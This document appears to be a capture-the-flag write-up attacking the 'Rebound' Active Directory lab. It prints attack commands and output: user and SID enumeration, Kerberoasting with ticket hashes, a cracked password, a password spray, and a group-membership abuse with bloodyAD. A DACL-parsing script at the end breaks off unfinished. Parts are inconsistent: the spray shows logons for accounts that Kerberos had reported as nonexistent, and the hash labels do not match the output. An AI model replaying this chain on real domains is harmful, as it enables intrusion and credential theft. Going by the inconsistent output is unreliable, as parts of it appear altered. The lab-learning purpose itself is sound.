NMAP:
# Nmap 7.93 scan initiated Mon Nov 20 15:20:29 2023 as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49673,49687,49688,49692,49708,49711,49717,49733 -Pn -n -oN allports 10.10.11.231
Nmap scan report for 10.10.11.231
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-21 03:20:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-21T03:21:43+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49687/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
49733/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-11-21T03:21:35
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 20 15:21:41 2023 -- 1 IP address (1 host up) scanned in 72.64 seconds
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
ldapsearch -H ldap://rebound.htb -x 'DC=rebound,DC=htb'
# extended LDIF
#
# LDAPv3
# base <> (default) with scope subtree
# filter: DC=rebound,DC=htb
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
cme smb rebound.htb -u '' -p '' --shares
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\:
SMB 10.10.11.231 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
I did not need to use kerbrute, because there was anonymous login on the SMB, and even if I could not dump the users, I could use other tools to dump them.
cme smb 10.10.11.231 -u 'fkafkafk' -p '' --users
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\fkafkafk:
SMB 10.10.11.231 445 DC01 [*] Trying to dump local users with SAMRPC protocol
lookupsid.py "REBOUND"/Guest@"rebound.htb" 20000 -no-pass
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Brute forcing SIDs at rebound.htb
[*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)
5277: rebound\jjones (SidTypeUser)
5569: rebound\mmalone (SidTypeUser)
5680: rebound\nnoon (SidTypeUser)
7681: rebound\ldap_monitor (SidTypeUser)
7682: rebound\oorend (SidTypeUser)
7683: rebound\ServiceMgmt (SidTypeGroup)
7684: rebound\winrm_svc (SidTypeUser)
7685: rebound\batch_runner (SidTypeUser)
7686: rebound\tbrady (SidTypeUser)
7687: rebound\delegator$ (SidTypeUser)
; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> any @10.10.11.231 rebound.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30411
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;rebound.htb. IN ANY
;; ANSWER SECTION:
rebound.htb. 600 IN A 10.10.11.231
rebound.htb. 3600 IN NS dc01.rebound.htb.
rebound.htb. 3600 IN SOA dc01.rebound.htb. hostmaster.rebound.htb. 141 900 600 86400 3600
;; ADDITIONAL SECTION:
dc01.rebound.htb. 3600 IN A 10.10.11.231
;; Query time: 66 msec
;; SERVER: 10.10.11.231#53(10.10.11.231) (TCP)
;; WHEN: Mon Nov 20 15:37:59 EST 2023
;; MSG SIZE rcvd: 138
Nothing too interesting, so I used a huge usernames wordlist to enumerate valid users on the domain, and found some of them after a while.
kerbrute userenum -d rebound.htb pos_users --dc 10.10.11.231
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/20/23 - Ronnie Flathers @ropnop
2023/11/20 16:02:56 > Using KDC(s):
2023/11/20 16:02:56 > 10.10.11.231:88
2023/11/20 16:02:56 > [+] VALID USERNAME: Guest@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: administrator@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: DC01$@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: llune@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: ppaul@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: winrm_svc@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: tbrady@rebound.htb
2023/11/20 16:02:56 > [+] VALID USERNAME: fflock@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: oorend@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: mmalone@rebound.htb
2023/11/20 16:02:57 > [+] VALID USERNAME: jjones@rebound.htb
Tried to check if any user has "do not require pre-auth" set, and got 1, but I could not crack the hash.
GetNPUsers.py rebound.htb/ -usersfile pos_users -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:5426e0457614f99a6c79521c19701959$8738782dd7a6cfb29a480b7ff70f0d4c1177c7359bcc46b83948e69252574b29836bec24abd855d3e6c387bd94628b3b39c380b2347822d34e18f0cf79916e4777cbc82462def86c098d842fe5a2353904f0009586210cf225006abe1e91549d682c1ddb1be1b1779ff761fb7b806558012db927e675ff19a6f1fefac3fa3d16c0f10c11dd579873553a497e80c9c8d289bd0e720df86d77e9e9222d10b9291f0e4ced757b71f7a8b13a8a543d06139925734aba9e2b76e652a618e52cd4925a8b8f45fe87e7675fdd4deb58b9264997d0eac0ddb68d108c8d7fe35d164a99f1536c003f5442b684eed1
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
But knowing that the user was able to request tickets without a password, I could try an AS-REP roastable attack by requesting a TGT as that user for the different services or even other users on the domain. First I tried with the users that I had, but no luck; then, by reading in forums, I found that there was another user called ldap_monitor, which would be impossible to find in wordlists, so I added that user and checked if it was valid, and it was.
kerbrute userenum -d rebound.htb pos_users --dc 10.10.11.231
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/20/23 - Ronnie Flathers @ropnop
2023/11/20 17:07:08 > Using KDC(s):
2023/11/20 17:07:08 > 10.10.11.231:88
2023/11/20 17:07:08 > [+] VALID USERNAME: DC01$@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: Guest@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: tbrady@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: administrator@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: fflock@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: llune@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: ppaul@rebound.htb
2023/11/20 17:07:08 > [+] VALID USERNAME: winrm_svc@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: mmalone@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: oorend@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: ldap_monitor@rebound.htb
2023/11/20 17:07:09 > [+] VALID USERNAME: jjones@rebound.htb
Knowing that the user was valid, I tried the same attack by requesting a TGT as the user jjones, based on the new wordlist of usernames.
GetUserSPNs.py -no-preauth 'jjones' -usersfile pos_users -dc-host "10.10.11.231" -request rebound.htb/
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[-] Principal: administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$cb2f79a35a11c3a81cacd597$be23923aa136c2139a8a5101885302a72dcc522abf321ee8e787b6d343f5d733de09e0b29d6a2fb1110b96cfc4f6241aa545c3531c8830c9d5986766b12697df43a8c98716fe9b0e248db57d1fca1b01350fd591680a635fe9fd3e5bc97687c04200be3b3881ea5434edc00d091b4e55be19c8448807764de83680f0ff12e2ece49bc15380683248d9da22abd39faf80ad8e3eba92f11d35301f148a059c32aa73cbb69e432b6c2d2934c72c3ee522aac46585237160a88d29557dcd986a7be1b4788cfab04abb2787df885cc7838035be931180f58aac1acba6249a59669174ee4375859d82bcff7b6b62898eb283089ebc495d526775ca0859e7aefb834f360a63aecccbec9e4bd356a08b6c4fc4fdbcecc8f1d020b1db7c5117b7a93af2d7cd86707daae28832072831068fdbf9b5326174b450df7c33adce323140cd363c422821be7724f836b3a3c896052ac23d1b273ce247422d95a2c1563a32260150c4d831458077ee4186ccaa466d98c455609f2e514bbde5f2e7a47d3432019c1ee886d261aab59493b08a7170473f3fe59a3c4b4c5fc9d1579cc395e20ccafeaf0ee8aa03e0488aff7c1a3f4a73cecf7c58dcf4ab98d18dd296056946740c56a54528f3c5978260d95920070b7d2c35466cdc9f26125fcc9960a40d07f78447e6eeceba3096e6ae1979a29c88e9c6e62d8ed0a35cb33a8640772414f798c7be54e1908edbd492d01bef2fa9575fd8cebca993c44ffe62c621e6f3d44b2c34ff6c25259304ae3c16f9195a556b2be06db7215b99714bdda6f1dbf9635c0af7768f1c61faadd4422c49ea98022dcc7d4f33258f1f6ccbb29a063ad163ad7cb11c4cf076bf3dcc9ba85f0e6ab14211aef798a8138ba2f3ff6f5bbc805f1df3c3c8ae30cc14d19377f6bf145cfb219009284e0c3828cde29058b0f9c07795dcfb22b5070c51d29db01c4a14be6692444565fdfdd14c6e75111cd8aa3edc19d44185658ffa380837cc6eccacfc5bce4e3ceded49edd462b5f2a1071844c89606aecc5f8a08fc48c86c281d53020e8bf1ddd127b4083723862a2cecdf42ef3a4cf6ac4e9203440e8350abf306abc281bc9cc9957e936b914a63aead1f5fa7c3602f84d2df794bcaa8fb2bbd0539bfa3c4018c2e98d92649a062029ee639633099d2f5bdd43c254dd5eba7d0d4365911077fa98d477489092fe6eb7edab1d3258b318fecca951da7f67d8932ecde98370f943c46deb16a873820b6f11e8c568dd65b79fabe506d7841a3d904c703099491b43dac9d1db53a4998cf4f511d5ead270dd242c409d48eed3ded16244a5168a73c3c2ac3ba7f051539286310c1a1de139019a4fb3f2b12b5a262844
99f
[-] Principal: ServiceMgmt - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: ldap - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: ldap_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: rpc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: rpc_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: smb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Servr not found in Kerberos database)
[-] Principal: smb_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$a04af3f4cf9e505bf6c7c06fc0c96343$[hash body not preserved on this page]
I got 2 hashes, 1 for ldap and the other one for ldap_monitor, and I could only crack the hash for ldap_monitor.
With that password, I tried a password spray for all the users on the domain.
cme smb rebound.htb -u pos_users -p passwords --continue-on-success
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [-] rebound.htb\administrator:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ServiceMgmt:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [+] rebound.htb\oorend:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\winrm:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_svc:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\rpc:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\rpc_svc:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\smb:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\smb_svc:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
The odd thing is that the spray succeeded for many accounts: ServiceMgmt, oorend, winrm, ldap, ldap_svc, rpc, rpc_svc, smb, smb_svc and ldap_monitor all share the password 1GR8t@$$4u.
With a valid password I could use RustHound to collect the domain data for BloodHound, so I did that:
> rusthound -d rebound.htb -u 'ldap_monitor@rebound.htb' -p '1GR8t@$$4u' --fqdn-resolver --adcs -z -i 10.10.11.231 --old-bloodhound -n 10.10.11.231 --ldaps
---------------------------------------------------
Initializing RustHound at 17:29:20 on 11/20/23
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2023-11-20T22:29:20Z INFO rusthound] Verbosity level: Info
[2023-11-20T22:29:21Z INFO rusthound::ldap] Connected to REBOUND.HTB Active Directory!
[2023-11-20T22:29:21Z INFO rusthound::ldap] Starting data collection...
[2023-11-20T22:29:23Z INFO rusthound::ldap] All data collected for NamingContext DC=rebound,DC=htb
[2023-11-20T22:29:24Z INFO rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=rebound,DC=htb
[2023-11-20T22:29:24Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2023-11-20T22:29:24Z INFO rusthound::modules::adcs::parser] Found 11 enabled certificate templates
[2023-11-20T22:29:24Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2023-11-20T22:29:24Z INFO rusthound::json::checker] Starting checker to replace some values...
[2023-11-20T22:29:24Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] Resolving FQDN to IP address started...
[2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] IP address for DC01.REBOUND.HTB: 10.10.11.231
[2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] Resolving FQDN to IP address finished!
[2023-11-20T22:29:24Z INFO rusthound::modules] Starting checker for ADCS values...
[2023-11-20T22:29:24Z ERROR rusthound::modules::adcs::checker] Couldn't connect to server http://dc01.rebound.htb/certsrv/, please try manually and check for https access if EPA is enable.
[2023-11-20T22:29:24Z INFO rusthound::modules] Checking for ADCS values finished!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 16 users parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 61 groups parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 computers parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 2 ous parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 domains parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 cas parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 33 templates parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 2 gpos parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 21 containers parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] .//20231120172924_rebound-htb_rusthound.zip created!
RustHound Enumeration Completed at 17:29:24 on 11/20/23! Happy Graphing!
I loaded all the data into BloodHound and started analyzing it.
After looking for a good path I found a possible one, but the two users with control over the interesting group, ppaul and fflock, were not owned. I only had oorend and ldap_monitor, and BloodHound showed no privileges for them: neither was in the ServiceMgmt group, so I did not have GenericWrite over winrm_svc.
After a while reading forums I realized that the right that matters here (the validated Self write that lets an account add itself to a group) was not showing up as an edge in the graph I had collected, so I had to check the ACLs manually.
Since I knew ServiceMgmt was the interesting group, I read its DACL with dacledit.py, filtering for oorend:
dacledit.py -action read -target SERVICEMGMT -principal oorend -dc-ip 10.10.11.231 rebound.htb/'oorend':'1GR8t@$$4u' -use-ldaps -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-7682)
[*] ACE[2] info
[*] ACE Type : ACCESS_ALLOWED_ACE
[*] ACE flags : None
[*] Access mask : Self (0x8)
[*] Trustee (SID) : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
That ACCESS_ALLOWED_ACE with access mask Self (0x8) is the ADS_RIGHT_DS_SELF validated write on the group: it does not give oorend control over the group, it only lets oorend add its own account to the group's member attribute (what BloodHound calls AddSelf). I used a tool called BloodyAD to add myself.
Once oorend was a member of SERVICEMGMT I inherited the group's rights over the Service Users OU, so I granted myself full control over that OU, used it to take the ResetPassword right on winrm_svc, reset that user's password and connected with evil-winrm.
One important thing to highlight from this box: NTLM authentication to LDAP did not work for me, and since everything from here on goes over LDAP, password-only authentication kept failing. So before every action I requested a Kerberos ticket for the user I was acting as and authenticated with it (-k -no-pass).
lucas@parrot ~/machines/rebound/content/bloodyAD main ./bloodyAD.py -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 add groupMember SERVICEMGMT oorend
[+] oorend added to SERVICEMGMT
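To see what that Self ACE is at the byte level, here is a small parser for the nTSecurityDescriptor attribute that dacledit.py reads over LDAP. It is an added example, not dacledit.py, bloodyAD or BloodHound code: it walks a self-relative security descriptor, lists the allow-ACEs for one trustee SID and distinguishes the validated Self write on member (AddSelf, what oorend has) from WriteProperty on member (AddMember) and the generic rights. The descriptor it runs on is constructed here (oorend's SID is the one dacledit printed; the Domain Admins and Authenticated Users ACEs are added for contrast), not dumped from the box.

```python
"""Parse an AD nTSecurityDescriptor (self-relative SECURITY_DESCRIPTOR, as read over
LDAP) and list what its DACL grants one trustee SID. Added example, not dacledit.py,
bloodyAD or BloodHound code; the sample descriptor is constructed, not dumped."""
import struct
import uuid

# Access-mask bits for directory objects (winnt.h / MS-ADTS 5.1.3.2)
ADS_RIGHT_DS_SELF       = 0x00000008   # validated write, printed as "Self" by dacledit
ADS_RIGHT_DS_WRITE_PROP = 0x00000020
WRITE_DAC               = 0x00040000
WRITE_OWNER             = 0x00080000
GENERIC_ALL             = 0x10000000
GENERIC_WRITE           = 0x40000000
# The 'member' attribute and the 'Self-Membership' validated write share this rights GUID
MEMBER_GUID = uuid.UUID("bf9679c0-0de6-11d0-a285-00aa003049e2")
ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE, ACCESS_DENIED_OBJECT_ACE = 0x00, 0x05, 0x06
OBJECT_TYPE_PRESENT, INHERITED_OBJECT_TYPE_PRESENT = 0x1, 0x2


def parse_sid(buf: bytes, off: int):
    """Binary SID at `off` -> ("S-1-5-21-...", offset just past it)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), off + 8 + 4 * count


def parse_dacl(sd: bytes):
    """Return [(ace_type, ace_flags, mask, object_type_guid_or_None, trustee_sid), ...]."""
    *_, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)      # header: rev, sbz, control, 4 offsets
    if off_dacl == 0:
        return []                                             # NULL DACL: nothing to list
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    off, aces = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", sd, off)
        mask, = struct.unpack_from("<I", sd, off + 4)
        cursor, obj_type = off + 8, None
        if ace_type in (ACCESS_ALLOWED_OBJECT_ACE, ACCESS_DENIED_OBJECT_ACE):
            obj_flags, = struct.unpack_from("<I", sd, cursor)
            cursor += 4
            if obj_flags & OBJECT_TYPE_PRESENT:
                obj_type = uuid.UUID(bytes_le=sd[cursor:cursor + 16])   # GUIDs are stored little-endian
                cursor += 16
            if obj_flags & INHERITED_OBJECT_TYPE_PRESENT:
                cursor += 16
        sid, _ = parse_sid(sd, cursor)
        aces.append((ace_type, ace_flags, mask, obj_type, sid))
        off += ace_size
    return aces


def rights_for(sd: bytes, trustee: str):
    """Names of the rights that allow-ACEs grant `trustee` (deny ACEs and inheritance ignored)."""
    found = []
    for ace_type, _, mask, obj_type, sid in parse_dacl(sd):
        if sid != trustee or ace_type not in (ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE):
            continue
        for bit, name in ((GENERIC_ALL, "GenericAll"), (GENERIC_WRITE, "GenericWrite"),
                          (WRITE_DAC, "WriteDacl"), (WRITE_OWNER, "WriteOwner")):
            if mask & bit:
                found.append(name)
        if mask & ADS_RIGHT_DS_WRITE_PROP and obj_type in (None, MEMBER_GUID):
            found.append("AddMember")   # WriteProperty on member: add any principal
        if mask & ADS_RIGHT_DS_SELF and obj_type in (None, MEMBER_GUID):
            found.append("AddSelf")     # validated write: may add only its own account
    return found


# Builders, used only to construct the sample descriptor below
def build_sid(sid: str) -> bytes:
    rev, authority, *subs = (int(p) for p in sid.split("-")[1:])
    return struct.pack("<BB", rev, len(subs)) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def build_ace(ace_type: int, mask: int, sid: str, obj_type=None) -> bytes:
    body = struct.pack("<I", mask)
    if ace_type == ACCESS_ALLOWED_OBJECT_ACE:
        body += struct.pack("<I", OBJECT_TYPE_PRESENT if obj_type else 0) + (obj_type.bytes_le if obj_type else b"")
    body += build_sid(sid)
    return struct.pack("<BBH", ace_type, 0, 4 + len(body)) + body


def build_sd(aces) -> bytes:
    body = b"".join(aces)
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(body), len(aces), 0) + body        # ACL_REVISION_DS
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl             # SE_SELF_RELATIVE|SE_DACL_PRESENT


DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"
OOREND_SID = DOMAIN_SID + "-7682"                                                # SID dacledit printed for oorend
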